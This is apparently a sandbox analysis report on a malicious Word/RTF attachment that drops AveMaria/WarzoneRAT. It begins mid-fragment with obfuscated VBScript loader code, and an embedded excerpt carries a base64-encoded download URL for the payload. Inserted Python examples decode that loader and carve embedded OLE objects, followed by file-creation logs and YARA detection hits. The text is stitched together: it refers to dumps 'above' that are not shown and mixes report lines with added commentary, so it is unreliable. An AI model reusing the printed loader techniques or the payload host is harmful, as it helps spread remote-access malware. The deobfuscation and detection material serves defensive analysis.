odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. 
dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "e
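The scriptlet in these two streams never names its COM calls: every statement is glued together from fragments (`"CreateO" + "bje" + "ct"`, `"Se" + "t alxmd = " + ...`), stored in `var1`, and run through Execute twice (`execute sn556` where `sn556` holds `execute(var1)`), and the only two long literals at the top are base64. The Python below is an added example, not part of this report or of the sample, that replays just the string assignments of the excerpt (typed in from the dump above with the CRLFs the report renders as ".." restored) to recover the statements that reach Execute and to decode those literals. It creates no COM object and executes nothing from the script; `wslausfychks` and `cvwtr5ycbve` are kept as the undefined names they are in the excerpt.

```python
import base64
import re

# Excerpt of the VBScript the report prints from the Ole10Native streams,
# CRLFs restored. Typed in as this example's input; nothing is read from the sample.
SCRIPT = r'''
fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t
yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t
kvjusvsfdcsb = "bje"
cvbnm = "CreateO" + kvjusvsfdcsb + "ct"
soswjwslvc = "reate"
mosdoepfy9eqje = "Se"
vposaleusaogr = "(""Msx"
vposaleusaogr = vposaleusaogr + "ml2."
vposaleusaogr = vposaleusaogr + "DOMDocument"").C"
mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E"
mosdoepfy9eqje = mosdoepfy9eqje + "l"
mosdoepfy9eqje = mosdoepfy9eqje + "em"
mosdoepfy9eqje = mosdoepfy9eqje + "ent("
mosdoepfy9eqje = mosdoepfy9eqje + """a"
mosdoepfy9eqje = mosdoepfy9eqje + "ux"")"
var1 = mosdoepfy9eqje
sn556 = "ex" + "ec" + "ute" + "(var1)"
dim a32947234987235:execute sn556
ksvjvwdwye2r = "Data"
odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks"
var1 = odjeiojfyd2f8fu34u
sn556 = "ex" + "ec" + "ute" + "(var1)"
dim a32947234987234:execute(sn556)
buicd78 = "alxmd.Text = cvwtr5ycbve"
var1 = buicd78
sn556 = "ex" + "ec" + "ute" + "(var1)"
dim a32947234987236:execute sn556
'''

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=(.*)$')
EXEC_RE = re.compile(r'^execute\s*\(?\s*([A-Za-z_]\w*)\s*\)?\s*$', re.I)
STRING_RE = re.compile(r'"((?:[^"]|"")*)"')      # VBScript writes " inside a literal as ""
IDENT_RE = re.compile(r'[A-Za-z_]\w*')
B64_RE = re.compile(r'^[A-Za-z0-9+/]{16,}={0,2}$')


def split_statements(line):  # ':' separates statements, but not inside a literal
    parts, buf, in_str = [], [], False
    for ch in line:
        in_str ^= ch == '"'
        if ch == ':' and not in_str:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    return parts + ["".join(buf)]


def concat_value(rhs, env):
    """Evaluate a concatenation of literals and variables. '+', '&' and blanks
    are skipped, ' starts a comment, an unset variable is Empty (joins as "")."""
    out, i = [], 0
    while i < len(rhs):
        if rhs[i] == '"':
            m = STRING_RE.match(rhs, i)
            if not m:
                raise ValueError("unterminated literal: " + rhs)
            out.append(m.group(1).replace('""', '"'))
        elif rhs[i] == "'":
            break
        elif m := IDENT_RE.match(rhs, i):
            out.append(env.get(m.group(0), ""))
        else:
            i += 1
            continue
        i = m.end()
    return "".join(out)


def resolve_execute(env, name, depth=0):
    """Follow the Execute "execute(var1)" indirection down to the real statement."""
    text = env.get(name, "").strip()
    m = EXEC_RE.match(text)
    return resolve_execute(env, m.group(1), depth + 1) if m and depth < 8 else text


def emulate(script):
    """Replay the string assignments; return (variables, statements handed to
    Execute, in order). No COM object is created and nothing is executed."""
    env, executed = {}, []
    for line in script.splitlines():
        for stmt in map(str.strip, split_statements(line)):
            if m := ASSIGN_RE.match(stmt):
                env[m.group(1)] = concat_value(m.group(2), env)
            elif m := EXEC_RE.match(stmt):
                executed.append(resolve_execute(env, m.group(1)))
    return env, executed


def decode_base64_strings(env):
    """{variable: text} for every value that is base64 of printable ASCII."""
    found = {}
    for name, value in env.items():
        if B64_RE.match(value) and len(value) % 4 == 0:
            try:
                text = base64.b64decode(value, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if text.isprintable():
                found[name] = text
    return found
```

`emulate(SCRIPT)` returns, in order, `Set alxmd = CreateObject("Msxml2.DOMDocument").CreateElement("aux")`, `alxmd.DataType = wslausfychks` and `alxmd.Text = cvwtr5ycbve`: an MSXML element is being used as a base64 decoder, with `NodeTypedValue` read back as bytes by `BytesToStr` further down (for that to work `wslausfychks` must hold `bin.base64`; the line that sets it is not shown on this page). `decode_base64_strings` turns `fsdfdsfs` into the download URL, defanged httP://login[.]929389[.]ankura[.]us/AwOgYiWG/explorer.exe (the odd-case scheme is a trivial filter-evasion trick), and `yulkytjtrhtjrkdsarjky` into `explorer.exe`, the name under which the file-creation lines below record the download and the drop into Roaming.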
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe
Source: DZdtfhgYgeghD{.scT Static RTF information: Object: 0 Offset: 000007D1h DZdtfhgYgeghD{.scT
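Both `\x01Ole10Native` streams above carry the same embedded file, and the stream header already tells an analyst what the document exploit will do with it: the label gives the name and extension (`.scT`, a scriptlet), the stored temp path is where WINWORD.EXE writes it (the `File created: ...\Temp\DZdtfhgYgeghD{ .scT` lines above). The parser below is an added example, not part of this report, for carving those fields and the embedded file out of such a stream. Its test vector is constructed: it reuses the label and the two paths printed in the report with a stub scriptlet body instead of the real one, and the field order (DWORD total size, WORD flags, NUL-terminated label and source path, one uninterpreted DWORD, DWORD temp-path length, NUL-terminated temp path, DWORD data size, data) is the one oletools' oleobj parses; the 0x00030000 written into the uninterpreted DWORD is an assumption.

```python
import struct


def build_ole10native(label, src_path, temp_path, payload, unknown=0x00030000):
    """Constructed \\x01Ole10Native stream (not bytes from the sample). Field
    order is the one oletools' oleobj parses; `unknown` is never interpreted."""
    temp = temp_path.encode("latin-1") + b"\x00"
    body = (struct.pack("<H", 2)                       # flags/version word
            + label.encode("latin-1") + b"\x00"
            + src_path.encode("latin-1") + b"\x00"
            + struct.pack("<LL", unknown, len(temp)) + temp
            + struct.pack("<L", len(payload)) + payload)
    return struct.pack("<L", len(body)) + body


def parse_ole10native(stream):
    """Carve label, paths and the embedded file out of an Ole10Native stream."""
    def cstr(pos):                                    # NUL-terminated string
        end = stream.index(b"\x00", pos)
        return stream[pos:end].decode("latin-1"), end + 1
    (total,) = struct.unpack_from("<L", stream, 0)
    if total + 4 > len(stream):
        raise ValueError("stream shorter than its declared size")
    label, pos = cstr(6)                              # after DWORD size + WORD flags
    src_path, pos = cstr(pos)
    _unknown, temp_len = struct.unpack_from("<LL", stream, pos)
    temp_path, pos = cstr(pos + 8)
    (size,) = struct.unpack_from("<L", stream, pos)
    payload = stream[pos + 4:pos + 4 + size]
    if len(payload) != size:
        raise ValueError("embedded file truncated")
    return {"label": label, "src_path": src_path, "temp_path": temp_path,
            "temp_len": temp_len, "payload": payload}


def triage(stream):
    """First questions for a dropped OLE object: what is it, where will it land?"""
    obj = parse_ole10native(stream)
    head = obj["payload"][:512].lower()
    return {
        "extension": obj["label"].rsplit(".", 1)[-1].lower(),
        "drop_path": obj["temp_path"],
        "is_scriptlet": b"<scriptlet" in head,         # also matches '<scriptleT'
        "vbscript": b"vbscript" in head,
    }


# Constructed vector: label and paths as printed in the report, stub body.
SAMPLE = build_ole10native(
    "DZdtfhgYgeghD{.scT",
    r"C:\osdsTggH\DZdtfhgYgeghD{.scT",
    r"C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{.scT",
    b"<scriptleT>\r\n<script language = 'vbscript'>\r\n' ...\r\n</script>\r\n</scriptleT>",
)
```

On a real stream the `temp_len` field is a useful consistency check: it counts the temp path including its NUL, so a mismatch with `len(temp_path) + 1` means the path contains bytes the report's dump rendered invisibly (the `{ .scT` with a space in the file-creation lines versus `{.scT` in the stream dump is that kind of hint).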
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001900C8 8_2_001900C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197650 8_2_00197650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197219 8_2_00197219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197228 8_2_00197228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197640 8_2_00197640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001907EE 8_2_001907EE
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_0131A760 8_2_0131A760
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_01310048 8_2_01310048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_05890048 8_2_05890048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B00C8 20_2_002B00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7650 20_2_002B7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7228 20_2_002B7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7219 20_2_002B7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7640 20_2_002B7640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B07E0 20_2_002B07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E09850 20_2_04E09850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00042 20_2_04E00042
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00048 20_2_04E00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00048 20_2_05F00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00038 20_2_05F00038
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F00C8 29_2_001F00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7650 29_2_001F7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7219 29_2_001F7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7228 29_2_001F7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F07E0 29_2_001F07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01329850 29_2_01329850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01320048 29_2_01320048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500048 29_2_05500048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500006 29_2_05500006
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: explorer[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: explorer.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eDdYRRbouy.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
